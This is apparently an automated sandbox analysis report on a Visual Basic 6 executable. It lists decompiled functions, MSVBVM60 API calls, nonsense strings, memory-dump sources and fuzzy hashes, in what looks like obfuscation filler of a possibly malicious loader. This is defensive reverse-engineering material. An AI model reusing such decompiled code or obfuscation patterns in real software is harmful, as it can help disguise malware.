__vbaFreeObj.MSVBVM60(00000000,?,0041B428,000000B8), ref: 0041E41F
__vbaFileOpen.MSVBVM60(00000020,000000FF,000000C3,Finalt7), ref: 0041E432
__vbaFreeVar.MSVBVM60(0041E472), ref: 0041E464
__vbaFreeStr.MSVBVM60(0041E472), ref: 0041E46C

Strings

Septuagenarian, xrefs: 0041E264
Finalt7, xrefs: 0041E424

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#628#702AddrefFileListOpen
String ID: Finalt7$Septuagenarian
API String ID: 116228349-494714230
Opcode ID: 6914a0e4f4bcc1277b5f8199749b827670153a04e70a101630959ba935ba84c7
Instruction ID: 7eb8d25f06d0dc70c98c45ed3830849b2982ce956100159af8d95fe38c285d23
Opcode Fuzzy Hash: 6914a0e4f4bcc1277b5f8199749b827670153a04e70a101630959ba935ba84c7
Instruction Fuzzy Hash: 7291D370D00218BBDB14EB96DC45EDEB7B8EF54708F10812FF411BB1E2DB7899458AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0C7, Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 163
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041F0C7(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v28;
				char _v32;
				void* _v36;
				intOrPtr _v44;
				char _v52;
				char _v68;
				intOrPtr _v76;
				char _v84;
				char _v100;
				char* _t43;
				char* _t45;
				void* _t50;
				intOrPtr* _t51;
				void* _t52;
				void* _t54;
				intOrPtr* _t55;
				void* _t56;
				char* _t57;
				void* _t58;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t94;

				_push(0x401386);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t85;
				_v12 = _t85 - 0x78;
				_v8 = 0x401340;
				_push( &_v52);
				_t43 =  &_v68;
				_push(_t43);
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v68 = 0;
				_v84 = 0;
				_v100 = 0;
				_v44 = 0x4b;
				_v52 = 2;
				L0040143A();
				_push(0x41b704);
				_push(0x41b70c);
				L004014FA();
				_v76 = _t43;
				_push( &_v68);
				_t45 =  &_v84;
				_push(_t45);
				_v84 = 0x8008;
				L00401440();
				_push( &_v84);
				_push( &_v68);
				_push( &_v52);
				_push(3);
				L004014F4();
				if(_t45 != 0) {
					_t89 =  *0x4204c8; // 0x2a5e8b4
					if(_t89 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t80 =  *0x4204c8; // 0x2a5e8b4
					_t54 =  *((intOrPtr*)( *_t80 + 0x14))(_t80,  &_v36);
					asm("fclex");
					if(_t54 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t80);
						_push(_t54);
						L00401530();
					}
					_t55 = _v36;
					_t81 = _t55;
					_t56 =  *((intOrPtr*)( *_t55 + 0x138))(_t55, L"Swingletree", 1);
					asm("fclex");
					if(_t56 < 0) {
						_push(0x138);
						_push(0x41b428);
						_push(_t81);
						_push(_t56);
						L00401530();
					}
					L0040152A();
					L00401464();
					_t92 =  *0x4204c8; // 0x2a5e8b4
					if(_t92 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t82 =  *0x4204c8; // 0x2a5e8b4
					L0040142E();
					_t57 =  &_v36;
					L00401434();
					_t58 =  *((intOrPtr*)( *_t82 + 0x40))(_t82, _t57, _t57, _t56, _v24, 0x41b754, L"ELECTRORETINOGRAM");
					asm("fclex");
					if(_t58 < 0) {
						_push(0x40);
						_push(0x41b408);
						_push(_t82);
						_push(_t58);
						L00401530();
					}
					L0040152A();
				}
				_t94 =  *0x4204c8; // 0x2a5e8b4
				if(_t94 == 0) {
					_push(0x4204c8);
					_push(0x41b418);
					L00401536();
				}
				_t78 =  *0x4204c8; // 0x2a5e8b4
				_t50 =  *((intOrPtr*)( *_t78 + 0x14))(_t78,  &_v36);
				asm("fclex");
				if(_t50 < 0) {
					_push(0x14);
					_push(0x41b408);
					_push(_t78);
					_push(_t50);
					L00401530();
				}
				_t51 = _v36;
				_t79 = _t51;
				_t52 =  *((intOrPtr*)( *_t51 + 0xd0))(_t51,  &_v32);
				asm("fclex");
				if(_t52 < 0) {
					_push(0xd0);
					_push(0x41b428);
					_push(_t79);
					_push(_t52);
					L00401530();
				}
				_v32 = 0;
				L0040155A();
				L0040152A();
				_push(0x41f2f6);
				L0040152A();
				L00401512();
				return _t52;
			}

0x0041f0cc
0x0041f0d7
0x0041f0d8
0x0041f0e5
0x0041f0e8
0x0041f0f4
0x0041f0f5
0x0041f0f8
0x0041f0f9
0x0041f0fc
0x0041f0ff
0x0041f102
0x0041f105
0x0041f108
0x0041f10b
0x0041f10e
0x0041f115
0x0041f11c
0x0041f121
0x0041f126
0x0041f12b
0x0041f130
0x0041f136
0x0041f137
0x0041f13a
0x0041f13b
0x0041f142
0x0041f14d
0x0041f151
0x0041f155
0x0041f156
0x0041f158
0x0041f163
0x0041f169
0x0041f16f
0x0041f171
0x0041f176
0x0041f17b
0x0041f17b
0x0041f180
0x0041f18d
0x0041f190
0x0041f194
0x0041f196
0x0041f198
0x0041f19d
0x0041f19e
0x0041f19f
0x0041f19f
0x0041f1a4
0x0041f1b1
0x0041f1b3
0x0041f1b9
0x0041f1bd
0x0041f1bf
0x0041f1c4
0x0041f1c9
0x0041f1ca
0x0041f1cb
0x0041f1cb
0x0041f1d3
0x0041f1d8
0x0041f1dd
0x0041f1e3
0x0041f1e5
0x0041f1ea
0x0041f1ef
0x0041f1ef
0x0041f1f4
0x0041f209
0x0041f20f
0x0041f213
0x0041f21a
0x0041f21d
0x0041f221
0x0041f223
0x0041f225
0x0041f22a
0x0041f22b
0x0041f22c
0x0041f22c
0x0041f234
0x0041f234
0x0041f239
0x0041f23f
0x0041f241
0x0041f246
0x0041f24b
0x0041f24b
0x0041f250
0x0041f25d
0x0041f260
0x0041f264
0x0041f266
0x0041f268
0x0041f26d
0x0041f26e
0x0041f26f
0x0041f26f
0x0041f274
0x0041f27e
0x0041f280
0x0041f286
0x0041f28a
0x0041f28c
0x0041f291
0x0041f296
0x0041f297
0x0041f298
0x0041f298
0x0041f2a3
0x0041f2a6
0x0041f2ae
0x0041f2b3
0x0041f2e8
0x0041f2f0
0x0041f2f5

APIs

#573.MSVBVM60(?,?), ref: 0041F11C
__vbaStrCat.MSVBVM60(0041B70C,0041B704,?,?), ref: 0041F12B
__vbaVarTstNe.MSVBVM60(?,?,0041B70C,0041B704,?,?), ref: 0041F142
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,00008008,?,?,0041B70C,0041B704,?,?), ref: 0041F158
__vbaNew2.MSVBVM60(0041B418,004204C8,?), ref: 0041F17B
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041F19F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041F1CB
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041F1D3
#554.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041F1D8
__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041F1EF
__vbaCastObj.MSVBVM60(?,0041B754,ELECTRORETINOGRAM), ref: 0041F209
__vbaObjSet.MSVBVM60(?,00000000,?,0041B754,ELECTRORETINOGRAM), ref: 0041F213
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000040), ref: 0041F22C
__vbaFreeObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000040), ref: 0041F234
__vbaNew2.MSVBVM60(0041B418,004204C8,?), ref: 0041F24B
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041F26F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,000000D0), ref: 0041F298
__vbaStrMove.MSVBVM60(00000000,?,0041B428,000000D0), ref: 0041F2A6
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,000000D0), ref: 0041F2AE
__vbaFreeObj.MSVBVM60(0041F2F6), ref: 0041F2E8
__vbaFreeStr.MSVBVM60(0041F2F6), ref: 0041F2F0

Strings

ELECTRORETINOGRAM, xrefs: 0041F1FC
Swingletree, xrefs: 0041F1AB
K, xrefs: 0041F10E

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$#554#573CastListMove
String ID: ELECTRORETINOGRAM$K$Swingletree
API String ID: 303563741-2367554812
Opcode ID: 7d1de120576e6ecf8b5a7dcb1d93bbd2192d2061a86acb819b9d6d269cfbe571
Instruction ID: bef311d09f9d24688e0a48d8d95e2d17cf9989689f4d18678ec901f80a86c1fd
Opcode Fuzzy Hash: 7d1de120576e6ecf8b5a7dcb1d93bbd2192d2061a86acb819b9d6d269cfbe571
Instruction Fuzzy Hash: 5A519B71940218ABCB10EB91CC46EEEB7B8FF54704F64412FF105B71E2D77869468AB8

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE62, Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041EE62(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a20) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				intOrPtr _v132;
				char _v140;
				intOrPtr _v148;
				char _v156;
				char* _v164;
				char _v172;
				intOrPtr* _t69;
				char* _t71;
				void* _t73;
				intOrPtr* _t74;
				void* _t75;
				char _t76;
				intOrPtr* _t116;
				intOrPtr* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;
				intOrPtr _t128;

				_t123 = _t122 - 0xc;
				 *[fs:0x0] = _t123;
				_v16 = _t123 - 0x10c;
				_v12 = 0x401330;
				_v8 = 0;
				_t69 = _a4;
				 *((intOrPtr*)( *_t69 + 4))(_t69, __edi, __esi, __ebx,  *[fs:0x0], 0x401386, _t120);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				_v76 = 0;
				_v92 = 0;
				_v108 = 0;
				_v124 = 0;
				_v140 = 0;
				_v156 = 0;
				_v172 = 0;
				L004014BE();
				L004014BE();
				_push(0x356);
				_t71 =  &_v172;
				_push(_t71);
				L00401494();
				_push(_t71);
				L0040149A();
				L00401548();
				if( ~(0 | _t71 != 0x0000ffff) != 0) {
					_t128 =  *0x4204c8; // 0x2a5e8b4
					if(_t128 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t116 =  *0x4204c8; // 0x2a5e8b4
					_t73 =  *((intOrPtr*)( *_t116 + 0x14))(_t116,  &_v44);
					asm("fclex");
					if(_t73 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t116);
						_push(_t73);
						L00401530();
					}
					_t74 = _v44;
					_t117 = _t74;
					_t75 =  *((intOrPtr*)( *_t74 + 0x138))(_t74, L"Saddukisk8", 1);
					asm("fclex");
					if(_t75 < 0) {
						_push(0x138);
						_push(0x41b428);
						_push(_t117);
						_push(_t75);
						L00401530();
					}
					L0040152A();
					L0040148E();
					L0040155A();
					_t76 = 0xa;
					_v148 = 0x80020004;
					_v132 = 0x80020004;
					_v116 = 0x80020004;
					_v100 = 0x80020004;
					_v84 = 0x80020004;
					_v68 = 0x80020004;
					_v156 = _t76;
					_v140 = _t76;
					_v124 = _t76;
					_v108 = _t76;
					_v92 = _t76;
					_v76 = _t76;
					_v164 = L"syvaarsdrengen";
					_v172 = 8;
					L00401482();
					_push( &_v156);
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					L00401488();
					L0040155A();
					_push( &_v156);
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_t71 =  &_v60;
					_push(_t71);
					_push(7);
					L004014F4();
				}
				_push(0x41f0aa);
				L00401512();
				L00401512();
				L00401512();
				L00401512();
				return _t71;
			}

0x0041ee65
0x0041ee74
0x0041ee84
0x0041ee87
0x0041ee90
0x0041ee93
0x0041ee99
0x0041eea2
0x0041eea5
0x0041eea8
0x0041eeab
0x0041eeae
0x0041eeb1
0x0041eeb4
0x0041eeb7
0x0041eeba
0x0041eebd
0x0041eec0
0x0041eec6
0x0041eecc
0x0041eed2
0x0041eedd
0x0041eee2
0x0041eee7
0x0041eeed
0x0041eeee
0x0041eef3
0x0041eef4
0x0041ef0d
0x0041ef15
0x0041ef1b
0x0041ef21
0x0041ef23
0x0041ef28
0x0041ef2d
0x0041ef2d
0x0041ef32
0x0041ef3f
0x0041ef42
0x0041ef46
0x0041ef48
0x0041ef4a
0x0041ef4f
0x0041ef50
0x0041ef51
0x0041ef51
0x0041ef56
0x0041ef63
0x0041ef65
0x0041ef6b
0x0041ef6f
0x0041ef71
0x0041ef76
0x0041ef7b
0x0041ef7c
0x0041ef7d
0x0041ef7d
0x0041ef85
0x0041ef8a
0x0041ef94
0x0041efa0
0x0041efa1
0x0041efa7
0x0041efaa
0x0041efad
0x0041efb0
0x0041efb3
0x0041efbf
0x0041efc5
0x0041efcb
0x0041efce
0x0041efd1
0x0041efd4
0x0041efd7
0x0041efe1
0x0041efeb
0x0041eff6
0x0041effd
0x0041f001
0x0041f005
0x0041f009
0x0041f00d
0x0041f011
0x0041f012
0x0041f01c
0x0041f027
0x0041f02e
0x0041f032
0x0041f036
0x0041f03a
0x0041f03e
0x0041f03f
0x0041f042
0x0041f043
0x0041f045
0x0041f04a
0x0041f04d
0x0041f08c
0x0041f094
0x0041f09c
0x0041f0a4
0x0041f0a9

APIs

__vbaStrCopy.MSVBVM60 ref: 0041EED2
__vbaStrCopy.MSVBVM60 ref: 0041EEDD
__vbaVarErrI4.MSVBVM60(?,00000356), ref: 0041EEEE
#559.MSVBVM60(00000000,?,00000356), ref: 0041EEF4
__vbaFreeVar.MSVBVM60(00000000,?,00000356), ref: 0041EF0D
__vbaNew2.MSVBVM60(0041B418,004204C8,00000000,?,00000356), ref: 0041EF2D
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041EF51
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041EF7D
__vbaFreeObj.MSVBVM60 ref: 0041EF85
#611.MSVBVM60 ref: 0041EF8A
__vbaStrMove.MSVBVM60 ref: 0041EF94
__vbaVarDup.MSVBVM60 ref: 0041EFEB
#596.MSVBVM60(?,?,?,?,?,?,?), ref: 0041F012
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?), ref: 0041F01C
__vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F045
__vbaFreeStr.MSVBVM60(0041F0AA,00000000,?,00000356), ref: 0041F08C
__vbaFreeStr.MSVBVM60(0041F0AA,00000000,?,00000356), ref: 0041F094
__vbaFreeStr.MSVBVM60(0041F0AA,00000000,?,00000356), ref: 0041F09C
__vbaFreeStr.MSVBVM60(0041F0AA,00000000,?,00000356), ref: 0041F0A4

Strings

Saddukisk8, xrefs: 0041EF5D
syvaarsdrengen, xrefs: 0041EFD7

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckCopyHresultMove$#559#596#611ListNew2
String ID: Saddukisk8$syvaarsdrengen
API String ID: 3203029265-1755169998
Opcode ID: 966fe070c0b4bab0fd6387a28a37b763e68a0e6435320d10ac39112bd13587a0
Instruction ID: 7f4d31978f2a59165bf10aab11f1fce7cb1793232a2766c07a9cc88413231f5f
Opcode Fuzzy Hash: 966fe070c0b4bab0fd6387a28a37b763e68a0e6435320d10ac39112bd13587a0
Instruction Fuzzy Hash: B451FD71D00218ABCB51EF95C881ADEBBB8AF48704F50416BF50AB7291DB785689CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041E638, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041E638(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a24) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _v48;
				intOrPtr _v56;
				signed int _v64;
				char* _v88;
				signed int _v96;
				intOrPtr _v120;
				signed int _v128;
				char _v148;
				signed int _t46;
				void* _t48;
				intOrPtr* _t49;
				void* _t50;
				void* _t52;
				intOrPtr* _t53;
				void* _t54;
				intOrPtr* _t56;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t85;
				void* _t89;
				void* _t91;
				intOrPtr _t92;
				intOrPtr _t99;
				intOrPtr _t102;

				_t92 = _t91 - 0xc;
				 *[fs:0x0] = _t92;
				_v16 = _t92 - 0x94;
				_v12 = 0x4012d8;
				_v8 = 0;
				_t56 = _a4;
				_t46 =  *((intOrPtr*)( *_t56 + 4))(_t56, __edi, __esi, __ebx,  *[fs:0x0], 0x401386, _t89);
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v64 = 0;
				_v96 = 0;
				_v128 = 0;
				_v148 = 0;
				L004014BE();
				_push(0x41b5b8);
				L004014AC();
				L0040155A();
				_push(_t46);
				_push(0x41b54c);
				L004014EE();
				asm("sbb esi, esi");
				L00401512();
				if( ~( ~( ~_t46)) != 0) {
					_t99 =  *0x4204c8; // 0x2a5e8b4
					if(_t99 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t82 =  *0x4204c8; // 0x2a5e8b4
					_t48 =  *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v48);
					asm("fclex");
					if(_t48 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t82);
						_push(_t48);
						L00401530();
					}
					_t49 = _v48;
					_t83 = _t49;
					_t50 =  *((intOrPtr*)( *_t49 + 0x138))(_t49, L"ZEALOUSNESS", 1);
					asm("fclex");
					if(_t50 < 0) {
						_push(0x138);
						_push(0x41b428);
						_push(_t83);
						_push(_t50);
						L00401530();
					}
					L0040152A();
					_t102 =  *0x4204c8; // 0x2a5e8b4
					if(_t102 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t84 =  *0x4204c8; // 0x2a5e8b4
					_t52 =  *((intOrPtr*)( *_t84 + 0x14))(_t84,  &_v48);
					asm("fclex");
					if(_t52 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t84);
						_push(_t52);
						L00401530();
					}
					_t53 = _v48;
					_t85 = _t53;
					_t54 =  *((intOrPtr*)( *_t53 + 0x118))(_t53,  &_v148);
					asm("fclex");
					if(_t54 < 0) {
						_push(0x118);
						_push(0x41b428);
						_push(_t85);
						_push(_t54);
						L00401530();
					}
					L004014A6();
					L0040152A();
					_t46 = 3;
					_v56 = _t56;
					_v64 = 9;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v88 = L"Oxanilide";
					_v96 = 8;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v128 = _t46;
					_v120 = 0x35a799;
					asm("movsd");
					asm("movsd");
					_push(_t46);
					asm("movsd");
					_push(L"mSB5qV3eCDj221");
					_push(_v36);
					asm("movsd");
					L004014A0();
				}
				_v40 =  *0x4012d0;
				asm("wait");
				_push(0x41e84b);
				L00401512();
				L0040152A();
				return _t46;
			}

0x0041e63b
0x0041e64a
0x0041e65a
0x0041e65d
0x0041e666
0x0041e669
0x0041e66f
0x0041e678
0x0041e67b
0x0041e67e
0x0041e681
0x0041e684
0x0041e687
0x0041e68a
0x0041e68d
0x0041e690
0x0041e696
0x0041e69b
0x0041e6a0
0x0041e6aa
0x0041e6af
0x0041e6b0
0x0041e6b5
0x0041e6be
0x0041e6c7
0x0041e6cf
0x0041e6d5
0x0041e6db
0x0041e6dd
0x0041e6e2
0x0041e6e7
0x0041e6e7
0x0041e6ec
0x0041e6f9
0x0041e6fc
0x0041e700
0x0041e702
0x0041e704
0x0041e709
0x0041e70a
0x0041e70b
0x0041e70b
0x0041e710
0x0041e71d
0x0041e71f
0x0041e725
0x0041e729
0x0041e72b
0x0041e730
0x0041e735
0x0041e736
0x0041e737
0x0041e737
0x0041e73f
0x0041e744
0x0041e74a
0x0041e74c
0x0041e751
0x0041e756
0x0041e756
0x0041e75b
0x0041e768
0x0041e76b
0x0041e76f
0x0041e771
0x0041e773
0x0041e778
0x0041e779
0x0041e77a
0x0041e77a
0x0041e77f
0x0041e78c
0x0041e78e
0x0041e794
0x0041e798
0x0041e79a
0x0041e79f
0x0041e7a4
0x0041e7a5
0x0041e7a6
0x0041e7a6
0x0041e7b1
0x0041e7b9
0x0041e7c0
0x0041e7c6
0x0041e7c9
0x0041e7d3
0x0041e7d4
0x0041e7d5
0x0041e7d6
0x0041e7dc
0x0041e7e3
0x0041e7ed
0x0041e7ee
0x0041e7ef
0x0041e7f0
0x0041e7f4
0x0041e7f9
0x0041e803
0x0041e804
0x0041e805
0x0041e806
0x0041e807
0x0041e80c
0x0041e80f
0x0041e810
0x0041e815
0x0041e81e
0x0041e821
0x0041e822
0x0041e83d
0x0041e845
0x0041e84a

APIs

__vbaStrCopy.MSVBVM60 ref: 0041E696
#517.MSVBVM60(0041B5B8), ref: 0041E6A0
__vbaStrMove.MSVBVM60(0041B5B8), ref: 0041E6AA
__vbaStrCmp.MSVBVM60(0041B54C,00000000,0041B5B8), ref: 0041E6B5
__vbaFreeStr.MSVBVM60(0041B54C,00000000,0041B5B8), ref: 0041E6C7
__vbaNew2.MSVBVM60(0041B418,004204C8,0041B54C,00000000,0041B5B8), ref: 0041E6E7
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041E70B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041E737
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041E73F
__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041E756
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041E77A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000118), ref: 0041E7A6
__vbaI2I4.MSVBVM60(00000000,?,0041B428,00000118), ref: 0041E7B1
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000118), ref: 0041E7B9
__vbaLateMemCall.MSVBVM60(?,mSB5qV3eCDj221,00000003), ref: 0041E810
__vbaFreeStr.MSVBVM60(0041E84B,0041B54C,00000000,0041B5B8), ref: 0041E83D
__vbaFreeObj.MSVBVM60(0041E84B,0041B54C,00000000,0041B5B8), ref: 0041E845

Strings

ZEALOUSNESS, xrefs: 0041E717
Oxanilide, xrefs: 0041E7DC
mSB5qV3eCDj221, xrefs: 0041E807

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$#517CallCopyLateMove
String ID: Oxanilide$ZEALOUSNESS$mSB5qV3eCDj221
API String ID: 170075650-3806101588
Opcode ID: 5a98c76a3a789105938b77d80bcac8afcb4562a4a2326a6ec03e0ab5c16dabc4
Instruction ID: 3b5a840bffc7afb1ebda4ac14a19d4529afd92fcb8772776deefa7970af0600e
Opcode Fuzzy Hash: 5a98c76a3a789105938b77d80bcac8afcb4562a4a2326a6ec03e0ab5c16dabc4
Instruction Fuzzy Hash: 8651BF71D40214ABCB10EFA6CC46ADEBBB5EF54304F60812FF811BB1A2D77859458FA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041E870, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041E870(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				intOrPtr _v132;
				char _v140;
				intOrPtr _v148;
				char _v156;
				char* _v164;
				char _v172;
				intOrPtr* _t67;
				char* _t69;
				void* _t71;
				intOrPtr* _t72;
				void* _t73;
				char _t74;
				intOrPtr* _t111;
				intOrPtr* _t112;
				void* _t115;
				void* _t117;
				intOrPtr _t118;
				intOrPtr _t123;

				_t118 = _t117 - 0xc;
				 *[fs:0x0] = _t118;
				_v16 = _t118 - 0x10c;
				_v12 = 0x4012e8;
				_v8 = 0;
				_t67 = _a4;
				 *((intOrPtr*)( *_t67 + 4))(_t67, __edi, __esi, __ebx,  *[fs:0x0], 0x401386, _t115);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				_v76 = 0;
				_v92 = 0;
				_v108 = 0;
				_v124 = 0;
				_v140 = 0;
				_v156 = 0;
				_v172 = 0;
				L004014BE();
				_push(0x3f6b);
				_t69 =  &_v172;
				_push(_t69);
				L00401494();
				_push(_t69);
				L0040149A();
				L00401548();
				if( ~(0 | _t69 != 0x0000ffff) != 0) {
					_t123 =  *0x4204c8; // 0x2a5e8b4
					if(_t123 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t111 =  *0x4204c8; // 0x2a5e8b4
					_t71 =  *((intOrPtr*)( *_t111 + 0x14))(_t111,  &_v44);
					asm("fclex");
					if(_t71 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t111);
						_push(_t71);
						L00401530();
					}
					_t72 = _v44;
					_t112 = _t72;
					_t73 =  *((intOrPtr*)( *_t72 + 0x138))(_t72, L"VESTE", 1);
					asm("fclex");
					if(_t73 < 0) {
						_push(0x138);
						_push(0x41b428);
						_push(_t112);
						_push(_t73);
						L00401530();
					}
					L0040152A();
					L0040148E();
					L0040155A();
					_t74 = 0xa;
					_v148 = 0x80020004;
					_v132 = 0x80020004;
					_v116 = 0x80020004;
					_v100 = 0x80020004;
					_v84 = 0x80020004;
					_v68 = 0x80020004;
					_v156 = _t74;
					_v140 = _t74;
					_v124 = _t74;
					_v108 = _t74;
					_v92 = _t74;
					_v76 = _t74;
					_v164 = L"Passionwort5";
					_v172 = 8;
					L00401482();
					_push( &_v156);
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					L00401488();
					L0040155A();
					_push( &_v156);
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_t69 =  &_v60;
					_push(_t69);
					_push(7);
					L004014F4();
				}
				_v32 = 0x72bd;
				_push(0x41eaac);
				L00401512();
				L00401512();
				L00401512();
				return _t69;
			}

0x0041e873
0x0041e882
0x0041e892
0x0041e895
0x0041e89e
0x0041e8a1
0x0041e8a7
0x0041e8b0
0x0041e8b3
0x0041e8b6
0x0041e8b9
0x0041e8bc
0x0041e8bf
0x0041e8c2
0x0041e8c5
0x0041e8c8
0x0041e8cb
0x0041e8ce
0x0041e8d4
0x0041e8da
0x0041e8e0
0x0041e8e5
0x0041e8ea
0x0041e8f0
0x0041e8f1
0x0041e8f6
0x0041e8f7
0x0041e910
0x0041e918
0x0041e91e
0x0041e924
0x0041e926
0x0041e92b
0x0041e930
0x0041e930
0x0041e935
0x0041e942
0x0041e945
0x0041e949
0x0041e94b
0x0041e94d
0x0041e952
0x0041e953
0x0041e954
0x0041e954
0x0041e959
0x0041e966
0x0041e968
0x0041e96e
0x0041e972
0x0041e974
0x0041e979
0x0041e97e
0x0041e97f
0x0041e980
0x0041e980
0x0041e988
0x0041e98d
0x0041e997
0x0041e9a3
0x0041e9a4
0x0041e9aa
0x0041e9ad
0x0041e9b0
0x0041e9b3
0x0041e9b6
0x0041e9c2
0x0041e9c8
0x0041e9ce
0x0041e9d1
0x0041e9d4
0x0041e9d7
0x0041e9da
0x0041e9e4
